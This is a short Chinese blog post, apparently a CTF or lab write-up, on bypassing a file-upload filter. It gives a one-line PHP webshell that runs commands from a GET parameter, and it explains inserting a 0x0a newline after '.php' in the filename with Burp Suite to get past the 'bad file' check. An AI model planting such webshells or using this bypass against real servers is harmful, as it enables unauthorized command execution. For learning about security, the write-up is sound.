Web页面:
新建一个一句话木马:
0.php
<?php system($_GET[0]); ?>上传木马, burpsuite 抓包。
直接上传是回显 bad file。
我们查看数据包的二进制内容(hex),内容是以16进制显示的,找到文件名那一栏,在 .php 的后面添加换行符,在ASCII编码表中,回车符的16进制表示是0x0D,而换行符的16进制表示是0x0A,所以在这里填 0a。
send 后,我们访问一下。发现木马上传成功。
相关推荐
沈浩(种子思维作者)6 小时前
真的能精准医疗吗?癌症能提前发现吗?sunfove7 小时前
光网络的立交桥:光开关 (Optical Switch) 原理与主流技术解析vortex59 小时前
Wfuzz 全面使用指南:Web 应用模糊测试工具详解Kevin Wang72710 小时前
欧拉系统服务部署注意事项min18112345610 小时前
深度伪造内容的检测与溯源技术汤愈韬10 小时前
NAT策略汤愈韬10 小时前
Full Cone Natzbtlink10 小时前
现在还需要带电池的路由器吗?是用来干嘛的?桌面运维家11 小时前
vDisk配置漂移怎么办?VOI/IDV架构故障快速修复dalerkd11 小时前
忙里偷闲叙-谈谈最近两年